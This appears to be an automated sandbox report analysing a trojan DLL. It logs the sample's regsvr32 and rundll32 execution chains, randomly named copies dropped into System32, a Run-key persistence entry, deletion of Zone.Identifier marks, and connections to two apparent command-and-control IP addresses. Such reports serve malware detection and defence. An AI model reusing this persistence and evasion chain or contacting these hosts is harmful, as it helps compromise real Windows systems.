                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800248E05_2_00000001800248E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800091445_2_0000000180009144
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180005DB45_2_0000000180005DB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180004DDC5_2_0000000180004DDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000B1E05_2_000000018000B1E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180009E385_2_0000000180009E38
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180003BE85_2_0000000180003BE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180009BEC5_2_0000000180009BEC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800173F85_2_00000001800173F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180017BF85_2_0000000180017BF8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800154005_2_0000000180015400
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800010005_2_0000000180001000
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000741C5_2_000000018000741C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000E8285_2_000000018000E828
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800028345_2_0000000180002834
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180014C485_2_0000000180014C48
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018002005C5_2_000000018002005C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800164645_2_0000000180016464
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800054785_2_0000000180005478
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800068805_2_0000000180006880
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018002748C5_2_000000018002748C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001308C5_2_000000018001308C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800240985_2_0000000180024098
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001B8985_2_000000018001B898
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000C4985_2_000000018000C498
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180004CA05_2_0000000180004CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800110AC5_2_00000001800110AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800148B05_2_00000001800148B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800078B65_2_00000001800078B6
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180001CCC5_2_0000000180001CCC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000B8D05_2_000000018000B8D0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800198DC5_2_00000001800198DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800038DC5_2_00000001800038DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800264F85_2_00000001800264F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800084F85_2_00000001800084F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000BD005_2_000000018000BD00
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800155085_2_0000000180015508
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180018D0C5_2_0000000180018D0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800121105_2_0000000180012110
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001B5205_2_000000018001B520
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800291245_2_0000000180029124
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800135245_2_0000000180013524
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180009D245_2_0000000180009D24
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180023D285_2_0000000180023D28
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800021285_2_0000000180002128
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800209305_2_0000000180020930
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001F5505_2_000000018001F550
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180020D545_2_0000000180020D54
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800109545_2_0000000180010954
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800185605_2_0000000180018560
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000E5705_2_000000018000E570
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001C9745_2_000000018001C974
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000F1745_2_000000018000F174
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180025D845_2_0000000180025D84
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800055905_2_0000000180005590
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800171985_2_0000000180017198
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800159A05_2_00000001800159A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180011DAC5_2_0000000180011DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000D1AC5_2_000000018000D1AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800069C05_2_00000001800069C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000A1D45_2_000000018000A1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800079D85_2_00000001800079D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001C1DC5_2_000000018001C1DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000D1E05_2_000000018000D1E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800199E85_2_00000001800199E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800099EC5_2_00000001800099EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180028A045_2_0000000180028A04
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001FA085_2_000000018001FA08
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001E6145_2_000000018001E614
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180001A1C5_2_0000000180001A1C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000BA245_2_000000018000BA24
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180021A2C5_2_0000000180021A2C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800192305_2_0000000180019230
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000BE345_2_000000018000BE34
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800122445_2_0000000180012244
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800066505_2_0000000180006650
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800016605_2_0000000180001660
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800116645_2_0000000180011664
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001827C5_2_000000018001827C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800246805_2_0000000180024680
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180022A845_2_0000000180022A84
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000AE845_2_000000018000AE84
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800286905_2_0000000180028690
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800156945_2_0000000180015694
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800076945_2_0000000180007694
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800136985_2_0000000180013698
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800092985_2_0000000180009298
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018002629C5_2_000000018002629C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001629C5_2_000000018001629C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000569C5_2_000000018000569C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180027EA45_2_0000000180027EA4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800096B85_2_00000001800096B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000EAC45_2_000000018000EAC4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180018ECC5_2_0000000180018ECC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001B2F05_2_000000018001B2F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180007AF05_2_0000000180007AF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000E7085_2_000000018000E708
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: gdazhx1EIP.dllVirustotal: Detection: 43%
                      Source: gdazhx1EIP.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\gdazhx1EIP.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gdazhx1EIP.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\gdazhx1EIP.dll,DllRegisterServer
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AEDSEwQF\PBid.dll"
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SwzTtIAmqdPBna\Ntrjg.dll"
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GQmyGle\ScmiHVadtyVtThN.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NTIufvJuRVPL\QYaWGzhqdb.dll"
                      Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\AEDSEwQF\PBid.dll
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\Zyymwn\eKUKMW.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gdazhx1EIP.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\gdazhx1EIP.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NTIufvJuRVPL\QYaWGzhqdb.dll"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SwzTtIAmqdPBna\Ntrjg.dll"Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AEDSEwQF\PBid.dll"Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GQmyGle\ScmiHVadtyVtThN.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\Zyymwn\eKUKMW.dll"Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Users\user\AppData\Local\Zyymwn\Jump to behavior
                      Source: classification engineClassification label: mal84.troj.evad.winDLL@21/2@0/49
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123E3CB0 CreateWindowExW,RegisterTouchWindow,MessageBoxW,CoCreateInstance,new,ShowWindow,UpdateWindow,0_2_00007FFC123E3CB0
                      Source: C:\Windows\System32\loaddll64.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180005DB4 FindCloseChangeNotification,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,0_2_0000000180005DB4
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_01
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: gdazhx1EIP.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: gdazhx1EIP.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: gdazhx1EIP.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: gdazhx1EIP.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: gdazhx1EIP.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: gdazhx1EIP.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: gdazhx1EIP.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123D837D push rdi; ret 0_2_00007FFC123D8384
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123D8909 push rdi; ret 0_2_00007FFC123D8912
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E0D3 push 09B8E1F7h; retf 0_2_000000018001E0DD
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E0E9 push 8B48E1F7h; retf 0_2_000000018001E0F1
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180023127 push ebp; ret 0_2_0000000180023128
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E5C5 pushad ; ret 0_2_000000018001E5C7
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180022E55 push ebp; retf 0_2_0000000180022E56
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180023A7E push ebp; ret 0_2_0000000180023A86
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180022F5E push ebp; ret 0_2_0000000180022F64
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000838C push eax; ret 0_2_000000018000838E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC123D837D push rdi; ret 3_2_00007FFC123D8384
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC123D8909 push rdi; ret 3_2_00007FFC123D8912
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E0D3 push 09B8E1F7h; retf 3_2_000000018001E0DD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E0E9 push 8B48E1F7h; retf 3_2_000000018001E0F1
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023127 push ebp; ret 3_2_0000000180023128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E5C5 pushad ; ret 3_2_000000018001E5C7
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022E55 push ebp; retf 3_2_0000000180022E56
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023A7E push ebp; ret 3_2_0000000180023A86
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022F5E push ebp; ret 3_2_0000000180022F64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000838C push eax; ret 3_2_000000018000838E
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E0D3 push 09B8E1F7h; retf 4_2_000000018001E0DD
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E0E9 push 8B48E1F7h; retf 4_2_000000018001E0F1
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180023127 push ebp; ret 4_2_0000000180023128
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E5C5 pushad ; ret 4_2_000000018001E5C7
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180022E55 push ebp; retf 4_2_0000000180022E56
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180023A7E push ebp; ret 4_2_0000000180023A86
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180022F5E push ebp; ret 4_2_0000000180022F64
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000838C push eax; ret 4_2_000000018000838E
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001E0D3 push 09B8E1F7h; retf 5_2_000000018001E0DD
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001E0E9 push 8B48E1F7h; retf 5_2_000000018001E0F1
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180023127 push ebp; ret 5_2_0000000180023128
                      Source: gdazhx1EIP.dllStatic PE information: section name: .gxfg
                      Source: gdazhx1EIP.dllStatic PE information: section name: .gehcont
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gdazhx1EIP.dll
                      Source: C:\Windows\System32\rundll32.exePE file moved: C:\Windows\System32\AEDSEwQF\PBid.dllJump to behavior

                      Boot Survival

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PBid.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PBid.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PBid.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\loaddll64.exeFile opened: C:\Windows\system32\NTIufvJuRVPL\QYaWGzhqdb.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\SwzTtIAmqdPBna\Ntrjg.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\AEDSEwQF\PBid.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\GQmyGle\ScmiHVadtyVtThN.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Zyymwn\eKUKMW.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 6108Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll64.exeAPI coverage: 9.2 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 7.8 %
                      Source: C:\Windows\System32\loaddll64.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123DC334 FindFirstFileExW,0_2_00007FFC123DC334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC123DC334 FindFirstFileExW,3_2_00007FFC123DC334
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: regsvr32.exe, 00000006.00000003.513468675.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.513175048.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.512805756.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.652747193.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.651870805.0000000000B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123D9474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFC123D9474
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123DDD90 GetProcessHeap,0_2_00007FFC123DDD90
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123D3AD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FFC123D3AD0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123D9474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFC123D9474
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123D4944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFC123D4944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC123D3AD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFC123D3AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC123D9474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FFC123D9474
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC123D4944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FFC123D4944

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 115.178.55.22 80Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.105.115.71 8080Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123DAB50 cpuid 0_2_00007FFC123DAB50
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123D4A94 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FFC123D4A94

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 3.2.regsvr32.exe.9c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.25817df0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.1b000100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.9c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.1e1da4c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.ad0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.1e1da4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.regsvr32.exe.ef0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.ad0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.1b000100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.regsvr32.exe.ef0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.25817df0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.422527105.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.273153768.000001E1DA4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
